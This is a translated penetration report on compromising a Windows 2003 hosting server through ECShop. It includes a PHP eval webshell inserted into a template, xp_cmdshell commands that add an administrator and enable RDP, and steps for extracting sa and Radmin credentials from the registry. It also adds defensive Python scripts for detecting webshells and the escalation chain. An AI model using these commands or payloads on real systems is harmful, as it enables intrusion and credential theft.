About host defense from intrusion Elevation of Privilege on an IDC Server

Source: Internet
Author: User

This is a server penetration report recorded for one website. The article is written for reference only, so that readers can better prevent this kind of intrusion.

Target Server: Windows2003 + iis6 + php + mysql + mssql + serv-u
Target Website: Ecshop2.7x

Elevation of Privilege:
General steps
1. Upload an ASP webshell to detect the available components, ports, and directories.
2. Upload an ASPX webshell to test command execution and obtain information about processes, services, and ports.

Start

Ecshop 2.7.x has several injection vulnerabilities, so it is easy to obtain the back-end logon password.
This method is not described in detail here; it is easy to find on Baidu.
There are also many ways to get a shell from the back end. Here we use Module Management > Database > Project Management, select myship.lbi, and insert <?php eval($_POST[c])?>
Then connect to http://site/myship.php with a one-sentence shell client.
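As an added defender-side example (Python, not part of the original write-up): the template-injection step above leaves raw PHP inside a file that should contain only markup and template tags. The scanner below walks a template directory, flags any raw PHP open tag in .lbi/.dwt files, and treats eval/assert/system-style calls fed from a request superglobal as a webshell. The file names and contents are constructed, and the heuristic that template files never legitimately contain PHP is an assumption about this kind of deployment.

```python
"""Scan ECShop-style template files (.lbi/.dwt) for injected PHP webshells.

Added example, not code from the original write-up. Heuristic (assumption):
template files should contain only markup and {template} tags, so any raw
PHP open tag is suspicious, and a code-execution call fed from a request
superglobal is treated as a webshell. All sample files are constructed.
"""
import os
import re
import tempfile

# Raw PHP open tags: <?php, <?= or a short tag followed by whitespace.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=|(?=\s))", re.IGNORECASE)

# Code-execution functions fed directly from a request superglobal or a
# base64 blob: the classic "one-sentence" shell pattern.
WEBSHELL_CALL = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen)\s*\(\s*@?"
    r"(?:\$_(?:POST|GET|REQUEST|COOKIE)\b|base64_decode\s*\()",
    re.IGNORECASE,
)


def scan_text(text):
    """Return findings as (line_no, reason, stripped line) tuples."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if WEBSHELL_CALL.search(line):
            findings.append((line_no, "webshell", line.strip()))
        elif PHP_OPEN_TAG.search(line):
            findings.append((line_no, "raw_php", line.strip()))
    return findings


def scan_directory(root, extensions=(".lbi", ".dwt")):
    """Walk root and return {relative path: findings} for files that hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings = scan_text(fh.read())
            if findings:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                report[rel] = findings
    return report


# Constructed sample templates: one clean, one carrying a one-sentence
# shell, one with harmless but out-of-place raw PHP, one non-template file.
SAMPLE_TEMPLATES = {
    "library/clean.lbi": '<div class="ship">{$ship.name}</div>\n',
    "library/myship.lbi": '<div class="ship">{$ship.name}</div>\n'
                          '<?php eval($_POST[c])?>\n',
    "library/footer.lbi": '<span><?php echo date("Y"); ?></span>\n',
    "styles/style.css": "body { color: #000; }\n",
}


def demo():
    """Write the constructed templates into a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TEMPLATES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(content)
        return scan_directory(root)


if __name__ == "__main__":
    for rel, findings in demo().items():
        for line_no, reason, line in findings:
            print(f"{rel}:{line_no}: {reason}: {line}")
```

Run it against the live template directory (for example library/ under the ECShop web root) on a schedule, and compare the report with a known-good baseline so that a newly modified .lbi file stands out even when the injected code is obfuscated enough to escape the regexes.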

Information Collection

I. Check permissions

1. First, the PHP shell checks the directory browsing permissions on the server. D:/wwwroot/xxx/wwwroot/ can be seen; this is the usual practice of an IDC-managed site, where each user has independent permissions for the current user only and cannot traverse into other directories.
In addition, the C, D, E, and F drives cannot be browsed. Because PHP and ASP inherit the permissions of the IIS user, the directories cannot be listed.

2. List the program directories.

360 and Microsoft SQL Server are present, which suggests two methods of elevation of privilege.

II. Detect the target services

Upload the ASP shell to detect server components:
1. Wscript.Shell (the command-line execution component): not supported.

2. Common ports:
127.0.0.1:1433 ...... open
127.0.0.1:3389 ...... closed
127.0.0.1:43958 ...... open

3. C:\Documents and Settings\All Users: no permission to access.
C:\Documents and Settings\All Users\Start Menu\Programs: no permission to access.
C:\Documents and Settings\All Users\Documents: can be read and written.

4. View system services: "Object doesn't support this property or method" (the Workstation service is disabled).

5. Check the administrator account through Wscript.Network: Wscript.Network is disabled.

3. IIS Spy lists the IIS users, passwords, domain names, and local paths.

4. Process listing; the following processes are useful:
No.  PID    Name       Description
1    1176   hzclient   Huazhong host client
12   1588   r_server   Radmin control server
18   10660  shstat     McAfee anti-virus
55   3548   SERVUTRAY  Serv-U server
73   10892  mysqld     MySQL database

5. Service listing; the following services are useful:
No.  PID    Name      Path
29   1176   hzclient  d:\hzhost\hzclient.exe
72   1588   r_server  "C:\WINDOWS\system32\r_server.exe" /service
41   1312   McShield  "C:\Program Files\McAfee\VirusScan Enterprise\mcshield.exe"
50   10892  MySQL51   "E:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" --defaults-file="E:\Program Files\MySQL\MySQL Server 5.1\my.ini" MySQL51
79   5708   Serv-U    e:\program files\Serv-U\ServUDaemon.exe

III. Target service analysis

Privilege escalation ideas: 360 local elevation of privilege, Serv-U local elevation of privilege, MySQL root elevation, MSSQL sa elevation, reading information from the Huazhong host registry key for elevation, and reading information from the Radmin registry key for elevation.


IV. Elevation of Privilege

1. Upload the 360 privilege escalation exploit. Calling C:\Documents and Settings\All Users\Documents\cmd.exe through the ASPX shell fails to execute. Since 360 updates automatically, the chance of success is now very small.

2. Serv-U local elevation of privilege, executed with the Serv-U local elevation tool integrated in the ASPX shell: failed.

Password verification is required, and there is no permission to read the Serv-U configuration file.

3. MySQL root elevation: look for data/mysql/user.MYD.
No permission.

4. Elevation by reading information from the Huazhong host registry key HKEY_LOCAL_MACHINE\SOFTWARE\hzhost\config\settings.

According to the earlier vulnerability description, the sa and root credentials are available here.

Next, use the sysstr tool. Connecting as sa gives an error.
Logging on with the hzhost user works, but the logon permission is only public; there is basically no hope of escalating that way.
Mssqlpss = 2 PDjjPpqVZqbrnGgy # Why c7eea052b52 cannot be decoded.

Taking a closer look, there is also a sysdbsa = value, and the tool decodes it. The ASPX shell's database function connects successfully!

The sa user has the highest permissions.
Next, add a user and execute:

xp_cmdshell "net user admin udb311 /add & net localgroup administrators admin /add"

Enable 3389:
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Save the preceding command as 3389.bat.
Upload the file to a writable directory and then execute:
xp_cmdshell "C:\Documents and Settings\All Users\Documents\3389.bat"

Successful.
Still unable to connect to 3389. Checked that both Windows Firewall and IPsec are disabled; still unable to connect, which is depressing.


5. Elevation by reading information from the Radmin registry key. The ASPX shell cannot read this key:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
Export it with system permission:
regedit /e d:\wwwroot\xxx\radmin.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters
Save the above command as 1.bat and upload it, then execute:
xp_cmdshell "C:\Documents and Settings\All Users\Documents\1.bat"
Next, download the exported radmin.reg with the webshell.
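As an added defender-side example (Python, not part of the original write-up): the sa-to-SYSTEM chain above leaves a characteristic footprint on the host, a shell spawned by the SQL Server service process followed by account creation, a change to the local Administrators group, the fDenyTSConnections flip, and a registry export of the Radmin key. The script below runs simple rules over a constructed process-creation and registry log and flags a host when those follow-on events cluster around a sqlservr.exe-spawned shell. The log format, field names, and the one-hour window are assumptions (Windows 2003 itself records no parent process or command line; this presumes telemetry from an EDR agent or a newer host), and the rules also cover reg export and powershell.exe, which the write-up does not mention.

```python
"""Detect an xp_cmdshell-driven escalation chain in process/registry logs.

Added example, not code from the original write-up. The log format below
is constructed: a timestamp followed by key=value pairs, with src=proc for
process creation and src=reg for a registry value being set. Hosts, paths
and times are invented sample data.
"""
import re
from datetime import datetime, timedelta

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
TS_FMT = "%Y-%m-%d %H:%M:%S"

SQL_SERVICE = "sqlservr.exe"          # parent process for xp_cmdshell children
SHELLS = {"cmd.exe", "powershell.exe"}
WINDOW = timedelta(hours=1)           # assumption: chain completes within an hour

ACCOUNT_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)
LOCAL_ADMIN_ADD = re.compile(
    r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I)
RDP_ENABLE_CMD = re.compile(r"\breg(?:\.exe)?\s+add\b.*fDenyTSConnections.*/d\s+0+\b", re.I)
REG_EXPORT = re.compile(
    r"\b(?:regedit(?:\.exe)?\s+/e|reg(?:\.exe)?\s+export)\b.*\b(?:RAdmin|hzhost)\b", re.I)

# Constructed sample log (not real telemetry).
SAMPLE_LOG = r"""
2019-05-01 10:00:01 host=web01 src=proc parent=svchost.exe image=w3wp.exe cmdline="w3wp.exe -ap DefaultAppPool"
2019-05-01 10:14:22 host=web01 src=proc parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c net user admin <pw> /add & net localgroup administrators admin /add"
2019-05-01 10:14:22 host=web01 src=proc parent=cmd.exe image=net.exe cmdline="net user admin <pw> /add"
2019-05-01 10:14:23 host=web01 src=proc parent=cmd.exe image=net.exe cmdline="net localgroup administrators admin /add"
2019-05-01 10:16:05 host=web01 src=proc parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c C:\Documents and Settings\All Users\Documents\3389.bat"
2019-05-01 10:16:05 host=web01 src=reg key="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" value=fDenyTSConnections data=0
2019-05-01 10:40:10 host=web01 src=proc parent=sqlservr.exe image=cmd.exe cmdline="cmd.exe /c C:\Documents and Settings\All Users\Documents\1.bat"
2019-05-01 10:40:11 host=web01 src=proc parent=cmd.exe image=regedit.exe cmdline="regedit /e d:\wwwroot\xxx\radmin.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters"
2019-05-01 11:05:00 host=db02 src=proc parent=explorer.exe image=cmd.exe cmdline="cmd.exe"
"""


def parse_line(line):
    """Parse one log line into a dict with a datetime 'ts'; None if malformed."""
    try:
        ts = datetime.strptime(line[:19], TS_FMT)
    except ValueError:
        return None
    event = {"ts": ts}
    for key, quoted, bare in KV.findall(line[19:]):
        event[key] = quoted if quoted else bare
    return event if "host" in event and "src" in event else None


def classify(event):
    """Return the list of rule names one event triggers."""
    hits = []
    if event["src"] == "proc":
        image = event.get("image", "").lower()
        parent = event.get("parent", "").lower()
        cmdline = event.get("cmdline", "")
        if parent == SQL_SERVICE and image in SHELLS:
            hits.append("sql_spawned_shell")       # xp_cmdshell indicator
        if ACCOUNT_ADD.search(cmdline):
            hits.append("account_added")
        if LOCAL_ADMIN_ADD.search(cmdline):
            hits.append("local_admin_added")
        if RDP_ENABLE_CMD.search(cmdline):
            hits.append("rdp_enabled")
        if REG_EXPORT.search(cmdline):
            hits.append("credential_key_exported")
    elif event["src"] == "reg":
        data = event.get("data", "")
        if event.get("value", "").lower() == "fdenytsconnections" and data and data.strip("0") == "":
            hits.append("rdp_enabled")
    return hits


def analyze(log_text):
    """Group rule hits per host and flag a SQL-to-OS escalation chain."""
    per_host = {}
    for line in log_text.splitlines():
        event = parse_line(line)
        if not event:
            continue
        for rule in classify(event):
            per_host.setdefault(event["host"], {}).setdefault(rule, []).append(event["ts"])
    report = {}
    for host, rules in per_host.items():
        shells = rules.get("sql_spawned_shell", [])
        # Follow-on actions are only tied to the chain if they fall within
        # WINDOW of some shell spawned by the SQL Server service.
        followed_by = sorted(
            rule for rule, times in rules.items()
            if rule != "sql_spawned_shell"
            and any(abs(t - s) <= WINDOW for t in times for s in shells)
        )
        report[host] = {
            "sql_spawned_shell": bool(shells),
            "followed_by": followed_by,
            "incident": bool(shells) and bool(followed_by),
        }
    return report


if __name__ == "__main__":
    for host, verdict in analyze(SAMPLE_LOG).items():
        print(host, verdict)
```

The sql_spawned_shell rule alone is worth alerting on in an environment where xp_cmdshell is supposed to be disabled; the correlation step mainly raises confidence and tells the responder which follow-on actions (new local administrator, RDP enabled, exported credential keys) need to be undone.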

